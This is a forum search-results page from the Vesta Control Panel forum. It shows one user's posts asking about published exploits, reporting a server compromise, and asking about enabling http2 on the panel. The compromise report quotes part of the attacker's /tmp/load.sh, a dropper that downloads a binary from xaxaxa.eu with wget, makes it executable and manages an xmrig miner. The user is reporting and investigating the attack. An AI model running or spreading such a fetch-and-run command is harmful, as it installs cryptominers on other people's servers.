Vesta Control Panel - Forum

sauvegardezvous99

ok the project is dead now : https://github.com/serghey-rodin/vesta/issues/2006

sauvegardezvous99

hello,

2 serious new disclosures have been published here :

https://www.exploit-db.com/exploits/49220
https://www.exploit-db.com/exploits/49219

Does the team work on it ? do you provide a patch soon ?

best,

sauvegardezvous99

hello,

have you a solution for this ? :

https://www.exploit-db.com/exploits/48294
https://pentest.blog/vesta-control-pane ... -analysis/

this ?
https://github.com/serghey-rodin/vesta/ ... 9437393c30

thank you ,

sauvegardezvous99

you rock! thx you.

sauvegardezvous99

you're up to date, good so far. now you need to clean your server - my point of view: Do not trust a infected server anymore. Better install a new one and migrate the users there. as you said, I've shutdown the hacked server and move manually all users to another one. no chance to take. thank you f...

sauvegardezvous99

Can you send a more informations about creation time of the files? Vesta Dev team has patched this issue with release 22, for further investigation we need to be sure that the infection was after upgrade to 22. to answer your question, I was indeed on 20 version. [xxx@two /]# cd /usr/local/vesta/bi...

sauvegardezvous99

hello team, just hacked by a dump hacker who use xaxaxa.eu/* and some sh script. I am currently investiguating if vesta was on release 22. /tmp/load.sh if pgrep -x "gcc" > /dev/null then echo "Running" else cd; pkill -f xmrig; wget -O /tmp/gcc http://xaxaxa.eu/gcc; chmod +x gcc; wget -O /tmp/config_...

sauvegardezvous99

skurudo wrote:

Code: Select all

Can you pls tell why you need http2 in CP?[/quote]

Why, because it recommends by Google Chrome to move from http1.1 to http2 for enhance web performance.

[quote]Control Panel will be faster or slow now for you?[/quote]
I don't get it. if vesta runs faster with http2 for me ?

sauvegardezvous99

skamasle wrote:You not have http2 module installed if you get that warning.

I know this.

But, on the other hand, all vhosts running on that server has ngx_mod_http2 activated.
It seems that vesta runs under its own configuration files.

sauvegardezvous99

hello guyzzzzzz , do you think to implement "http2" for nginx listening on 8083? I am able to add SSL certificate but not actiavated "http2" protocol. here's the error I got when I added "listen 8083 ssl http2" in config file /usr/local/vesta/nginx/conf/nginx.conf service vesta restart Stopping vest...

Vesta Control Panel - Forum

Search found 25 matches

Re: VULNERABILITY v.0.9.8-26 : when new update will be available?

VULNERABILITY v.0.9.8-26 : when new update will be available?

New exploit -

Re: Script for generating letsencrypt SSL and configuring all daemons (Apache, nginx, dovecot, Exim, Vesta) to use it

Re: have been HACKED ! by xaxaxa.eu

Re: have been HACKED ! by xaxaxa.eu

have been HACKED ! by xaxaxa.eu

Re: http2 on port 8083 ?

Re: http2 on port 8083 ?

http2 on port 8083 ?

Search found 25 matches

Login • Register